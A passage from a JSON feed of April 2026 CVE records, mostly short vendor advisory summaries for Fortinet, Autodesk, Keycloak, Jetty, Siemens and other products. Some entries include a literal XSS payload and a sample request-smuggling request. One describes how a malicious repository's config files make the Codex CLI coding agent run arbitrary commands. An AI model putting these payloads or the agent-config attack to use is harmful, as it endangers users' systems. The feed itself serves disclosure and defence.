Fortinet FortiOS 7.6.0 through 7.6.4, FortiOS 7.4.0 through 7.4.9, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiPAM 1.7.0, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.4, FortiProxy 7.4.0 through 7.4.11, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiSwitchManager 7.2.0 through 7.2.7, FortiSwitchManager 7.0.0 through 7.0.6 may allow an authenticated attacker with admin profile and at least read-write permissions to write or delete arbitrary files via specific CLI commands.","cvss":6.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-122"],"published_time":"2026-04-14T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-61848","summary":"An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.8, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.8, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.8, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.8, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged authenticated attacker to execute unauthorized code or commands via JSON RPC 
API","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-111"],"published_time":"2026-04-14T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-61886","summary":"An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.4, FortiSandbox PaaS 5.0.0 through 5.0.4 may allow an attacker to perform an XSS attack via crafted HTTP requests.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-109"],"published_time":"2026-04-14T16:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-53847","summary":"A missing authentication for critical function vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiOS 6.4 all versions, FortiOS 6.2.9 through 6.2.17 allows attacker to execute unauthorized code or commands via specially crafted packets.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-125"],"published_time":"2026-04-14T16:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2024-23104","summary":"An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiNDR 7.6.0, FortiNDR 7.4.0 through 7.4.8, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR 7.0 all versions, FortiVoice 7.0.0 through 7.0.1 may allow a remote authenticated attacker with at least 
read-only permission on system maintenance to access backup information via crafted HTTP requests","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://fortiguard.fortinet.com/psirt/FG-IR-26-124"],"published_time":"2026-04-14T16:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4913","summary":"Improper protection of an alternate path in Ivanti N-ITSM before version 2025.4 allows a remote authenticated attacker to retain access when their account has been disabled.","cvss":5.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-CVE-2026-4913-CVE-2026-4914?language=en_US"],"published_time":"2026-04-14T15:16:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4914","summary":"Stored XSS in Ivanti N-ITSM before version 2025.4 allows a remote authenticated attacker to obtain limited information from other user sessions. User interaction is required.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Neurons-for-ITSM-CVE-2026-4913-CVE-2026-4914?language=en_US"],"published_time":"2026-04-14T15:16:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4344","summary":"A maliciously crafted HTML payload in a component name, when displayed during the delete confirmation dialog and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. 
A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg","https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe","https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0005"],"published_time":"2026-04-14T15:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4345","summary":"A maliciously crafted HTML payload, stored in a design name and exported to CSV, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg","https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe","https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0005"],"published_time":"2026-04-14T15:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4369","summary":"A maliciously crafted HTML payload in an assembly variant name, when displayed during the delete confirmation dialog and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. 
A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg","https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe","https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0005"],"published_time":"2026-04-14T15:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37602","summary":"SourceCodester Patient Appointment Scheduler System v1.0 is vulnerable to SQL Injection in the file /scheduler/admin/user/manage_user.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/patient-appointment-scheduler-system/SQL-3.md"],"published_time":"2026-04-14T15:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37980","summary":"A flaw was found in Keycloak, specifically in the organization selection login page. A remote attacker with `manage-realm` or `manage-organizations` administrative privileges can exploit a Stored Cross-Site Scripting (XSS) vulnerability. This flaw occurs because the `organization.alias` is placed into an inline JavaScript `onclick` handler, allowing a crafted JavaScript payload to execute in a user's browser when they view the login page. 
Successful exploitation enables arbitrary JavaScript execution, potentially leading to session theft, unauthorized account actions, or further attacks against users of the affected realm.","cvss":6.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://access.redhat.com/security/cve/CVE-2026-37980","https://bugzilla.redhat.com/show_bug.cgi?id=2455325"],"published_time":"2026-04-14T15:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37592","summary":"Sourcecodester Storage Unit Rental Management System v1.0 is vulnerable to SQL in the file /storage/admin/maintenance/manage_pricing.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/storage-unit-rental-management-system/SQL-4.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37593","summary":"SourceCodester Online Employees Work From Home Attendance System v1.0 is vulnerable to SQL Injection in the file /wfh_attendance/admin/view_att.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/online-employees-work-home-attendance-system/SQL-1.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37594","summary":"SourceCodester Online Employees Work From Home Attendance System v1.0 is vulnerable to SQL Injection in the file 
/wfh_attendance/admin/view_employee.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/online-employees-work-home-attendance-system/SQL-2.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37595","summary":"SourceCodester Online Employees Work From Home Attendance System v1.0 is vulnerable to SQL Injection in the file /wfh_attendance/admin/manage_employee.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/online-employees-work-home-attendance-system/SQL-4.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37596","summary":"SourceCodester Online Employees Work From Home Attendance System v1.0 is vulnerable to SQL Injection in the file /wfh_attendance/admin/manage_department.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/online-employees-work-home-attendance-system/SQL-3.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37597","summary":"SourceCodester Online Employees Work From Home Attendance System v1.0 is vulnerable to SQL Injection in the file 
/wfh_attendance/admin/attendance_list.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/online-employees-work-home-attendance-system/SQL-5.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37598","summary":"SourceCodester Patient Appointment Scheduler System v1.0 is vulnerable to arbitrary code execution (RCE) via /scheduler/classes/SystemSettings.php?f=update_settings.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/patient-appointment-scheduler-system/RCE-1.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37600","summary":"SourceCodester Patient Appointment Scheduler System v1.0 is vulnerable to SQL Injection in the file /scheduler/admin/appointments/view_details.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/patient-appointment-scheduler-system/SQL-1.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37601","summary":"SourceCodester Patient Appointment Scheduler System v1.0 is vulnerable to SQL Injection in the file 
/scheduler/admin/appointments/manage_appointment.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/patient-appointment-scheduler-system/SQL-2.md"],"published_time":"2026-04-14T15:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37589","summary":"SourceCodester Storage Unit Rental Management System v1.0 is vulnerable to SQL Injection in the file /storage/admin/maintenance/manage_storage_unit.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/storage-unit-rental-management-system/SQL-3.md"],"published_time":"2026-04-14T15:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37590","summary":"SourceCodester Storage Unit Rental Management System v1.0 is vulnerable to SQL Injection in the file /storage/admin/rents/manage_rent.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/storage-unit-rental-management-system/SQL-1.md"],"published_time":"2026-04-14T15:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-37591","summary":"Sourcecodester Storage Unit Rental Management System v1.0 is vulnerable to SQL injection in the file 
/storage/admin/tenants/view_details.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/shininadd/cve_report/blob/main/sourcecodester/storage-unit-rental-management-system/SQL-2.md"],"published_time":"2026-04-14T15:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-30480","summary":"A Local File Inclusion (LFI) vulnerability in the NFSen module (nfsen.inc.php) of LibreNMS 22.11.0-23-gd091788f2 allows authenticated attackers to include arbitrary PHP files from the server filesystem via path traversal sequences in the nfsen parameter.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/parlakbarann/CVE-2026-30480"],"published_time":"2026-04-14T15:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-69893","summary":"A side-channel vulnerability exists in the implementation of BIP-39 mnemonic processing, as observed in Trezor One v1.13.0 to v1.14.0, Trezor T v1.13.0 to v1.14.0, and Trezor Safe v1.13.0 to v1.14.0 hardware wallets. This originates from the BIP-39 standard guidelines, which induce non-constant time execution and specific branch patterns for word searching. An attacker with physical access during the initial setup phase can collect a single side-channel trace. By utilizing profiling-based Deep Learning Side-Channel Analysis (DL-SCA), the attacker can recover the mnemonic code and subsequently steal the assets. 
The issue was patched.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://trezor.com","https://trezor.io/vulnerability/fix-side-channel-in-bip-39-mnemonic-processing-when-unlocked"],"published_time":"2026-04-14T15:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-69993","summary":"Leaflet versions up to and including 1.9.4 are vulnerable to Cross-Site Scripting (XSS) via the bindPopup() method. This method renders user-supplied input as raw HTML without sanitization, allowing attackers to inject arbitrary JavaScript code through event handler attributes (e.g., <img src=x onerror=\"alert('XSS')\">). When a victim views an affected map popup, the malicious script executes in the context of the victim's browser session.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://leaflet.com","https://github.com/PierfrancescoConti/leaflet-cve-2025-69993/blob/main/ADVISORY.md"],"published_time":"2026-04-14T15:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-61260","summary":"A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enables code execution through malicious MCP (Model Context Protocol) configuration files. The attack is triggered when a user runs the codex command inside a malicious or compromised repository. 
Codex automatically loads project-local .env and .codex/config.toml files without requiring user confirmation, allowing attackers to embed arbitrary commands that execute immediately.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://openai.com","https://research.checkpoint.com/2025/openai-codex-cli-command-injection-vulnerability/"],"published_time":"2026-04-14T15:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31049","summary":"An issue in Hostbill v.2025-11-24 and 2025-12-01 allows a remote attacker to execute arbitrary code and escalate privileges via the CSV registration field","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://blog.hostbillapp.com/2025/12/03/hostbill-security-advisory/","https://github.com/Muhammad5235/HostBill-CVEs-2025/blob/main/Missing%20Server-Side%20Validation/Registration%20fields%20%26%20Import%20Csv","https://hostbillapp.com/changelog","https://hostbillapp.com/release-notes/11-27-2025.html","https://hostbillapp.com/release-notes/12-01-2025.html","https://hostbillapp.com/responsible-disclosure"],"published_time":"2026-04-14T14:16:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-8095","summary":"The OECH1 prefix encoding is intended to obfuscate values across the OpenEdge platform.  It has been identified as cryptographically weak and unsuitable for stored encodings and enterprise applications.  
OECH1 encodings should be considered exploitable and immediately replaced by any other supported prefix encoding, all of which are based on symmetric encryption.","cvss":9.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.1,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.progress.com/s/article/Unintended-Use-of-OECH1-for-Password-Secrets-Protection"],"published_time":"2026-04-14T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-7389","summary":"A vulnerability in the AdminServer component of OpenEdge on all supported platforms grants its authenticated users OS-level access to the server\nthrough the adopted authority of the AdminServer process itself.  The delegated authority of the AdminServer could allow its users the ability to read arbitrary files on the host system through the misuse of the setFile() and openFile()\n methods exposed through the RMI interface.  Misuse was limited only by OS-level authority of the AdminServer's elevated \nprivileges granted and the user's access to these methods enabled through RMI.  
The exploitable methods have been removed thus eliminating their access through RMI or downstream of the RMI registry.","cvss":8.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.2,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.progress.com/s/article/Important-Arbitrary-File-Ready-Security-Update-for-OpenEdge-AdminServer"],"published_time":"2026-04-14T14:16:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2450","summary":".NET misconfiguration: use of impersonation vulnerability in upKeeper Solutions upKeeper Instant Privilege Access allows Hijacking a Privileged Thread of Execution.This issue affects upKeeper Instant Privilege Access: through 1.5.0.","cvss":7.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.4,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://support.upkeeper.se/hc/en-us/articles/26783542353692-CVE-2026-2450-NET-misconfiguration-use-of-impersonation"],"published_time":"2026-04-14T13:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5307","summary":"Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: This candidate was issued in error. Notes: All references and descriptions in this candidate have been removed to prevent accidental usage.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":[],"published_time":"2026-04-14T13:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2024-9168","summary":"Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: This candidate was issued in error. 
Notes: All references and descriptions in this candidate have been removed to prevent accidental usage.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":[],"published_time":"2026-04-14T13:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2332","summary":"In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \"funky chunks\" techniques outlined here:\n  *  https://w4ke.info/2025/06/18/funky-chunks.html\n\n  *  https://w4ke.info/2025/10/29/funky-chunks-2.html\n\n\nJetty terminates chunk extension parsing at \\r\\n inside quoted strings instead of treating this as an error.\n\n\nPOST / HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n1;ext=\"val\nX\n0\n\nGET /smuggled HTTP/1.1\n...\n\n\n\n\n\nNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08705,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf","https://gitlab.eclipse.org/security/cve-assignment/-/issues/89"],"published_time":"2026-04-14T12:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2449","summary":"Improper neutralization of argument delimiters in a command ('argument injection') vulnerability in upKeeper Solutions upKeeper Instant Privilege Access allows Hijacking a Privileged Thread of Execution.This issue affects upKeeper Instant Privilege Access: through 
1.5.0.","cvss":9.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.0,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://support.upkeeper.se/hc/en-us/articles/26783425404444-CVE-2026-2449-Improper-neutralization-of-argument-delimiters-in-a-command"],"published_time":"2026-04-14T12:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-24069","summary":"Kiuwan SAST improperly authorizes SSO logins for locally disabled mapped user accounts, allowing disabled users to continue accessing the application. Kiuwan Cloud was affected, and Kiuwan SAST on-premise (KOP) was affected before 2.8.2509.4.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.04065,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://r.sec-consult.com/kiuwanlock","http://seclists.org/fulldisclosure/2026/Apr/5"],"published_time":"2026-04-14T12:16:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-13822","summary":"MCPHub in versions below 0.11.0 is vulnerable to authentication bypass. Some endpoints are not protected by authentication middleware, allowing an unauthenticated attacker to perform actions in the name of other users and using their privileges.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00043,"ranking_epss":0.13147,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cert.pl/en/posts/2026/04/CVE-2025-13822","https://github.com/samanhappy/mcphub"],"published_time":"2026-04-14T11:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33892","summary":"A vulnerability has been identified in Industrial Edge Management Pro V1 (All versions >= V1.7.6 < V1.15.17), Industrial Edge Management Pro V2 (All versions >= V2.0.0 < V2.1.1), Industrial Edge Management Virtual (All versions >= V2.2.0 < V2.8.0). 
Affected management systems do not properly enforce user authentication on remote connections to devices.\r\nThis could facilitate an unauthenticated remote attacker to circumvent authentication and impersonate a legitimate user.\r\nSuccessful exploitation requires that the attacker has identified the header and port used for remote connections to devices and that the remote connection feature is enabled for the device.\r\n\r\nExploitation allows the attacker to tunnel to the device. Security features on this device itself (e.g. app specific authentication) are not affected.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":5.1,"epss":0.00069,"ranking_epss":0.21061,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cert-portal.siemens.com/productcert/html/ssa-609469.html"],"published_time":"2026-04-14T09:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33929","summary":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache PDFBox Examples.\n\nThis issue affects the \nExtractEmbeddedFiles example in Apache PDFBox: from 2.0.24 through 2.0.36, from 3.0.0 through 3.0.7.\n\n\nUsers are recommended to update to version 2.0.37 or 3.0.8 once \navailable. Until then, they should apply the fix provided in GitHub PR \n427.\n\nThe ExtractEmbeddedFiles example contained a path traversal vulnerability (CWE-22) mentioned in CVE-2026-23907. However the change in the releases 2.0.36 and 3.0.7 is flawed because it doesn't consider the file path separator. Because of that, a user having writing rights on /home/ABC could be victim to a malicious PDF resulting in a write attempt to any path starting with /home/ABC, e.g. \"/home/ABCDEF\".\n\nUsers who have copied this example into their production code should apply the mentioned change. 
The example has been changed accordingly and is available in the project repository.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00019,"ranking_epss":0.04896,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/apache/pdfbox/pull/427/changes","https://lists.apache.org/thread/j8l07tgzy9dm8d8n0f3c45h7zg7t3ld6","https://lists.apache.org/thread/op3lyx1ngzy4qycn06l6hljyf28ff0zs"],"published_time":"2026-04-14T09:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4109","summary":"The Eventin – Events Calendar, Event Booking, Ticket & Registration (AI Powered) plugin for WordPress is vulnerable to unauthorized access of data due to an improper capability check on the get_item_permissions_check() function in all versions up to, and including, 4.1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read arbitrary order data including customer PII (name, email, phone) by iterating order IDs.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.06614,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/changeset/3501510/","https://www.wordfence.com/threat-intel/vulnerabilities/id/87f82d5d-d89a-440d-8c23-ace5160a0739?source=cve"],"published_time":"2026-04-14T09:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25654","summary":"A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP3). Affected products do not properly validate user authorization when processing password reset requests. 
This could allow an authenticated remote attacker to bypass authorization checks, leading to the ability to reset the password of any arbitrary user account.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00045,"ranking_epss":0.13521,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cert-portal.siemens.com/productcert/html/ssa-605717.html"],"published_time":"2026-04-14T09:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27668","summary":"A vulnerability has been identified in RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) (All versions < V5.8). User Administrators are allowed to administer groups they belong to. This could allow an authenticated User Administrator to escalate their own privileges and grant themselves access to any device group at any access level.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00039,"ranking_epss":0.11602,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cert-portal.siemens.com/productcert/html/ssa-741509.html"],"published_time":"2026-04-14T09:16:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31908","summary":"Header injection vulnerability in Apache APISIX.\n\nThe attacker can take advantage of certain configuration in forward-auth plugin to inject malicious headers.\nThis issue affects Apache APISIX: from 2.12.0 through 3.15.0.\n\nUsers are recommended to upgrade to version 3.16.0, which fixes the 
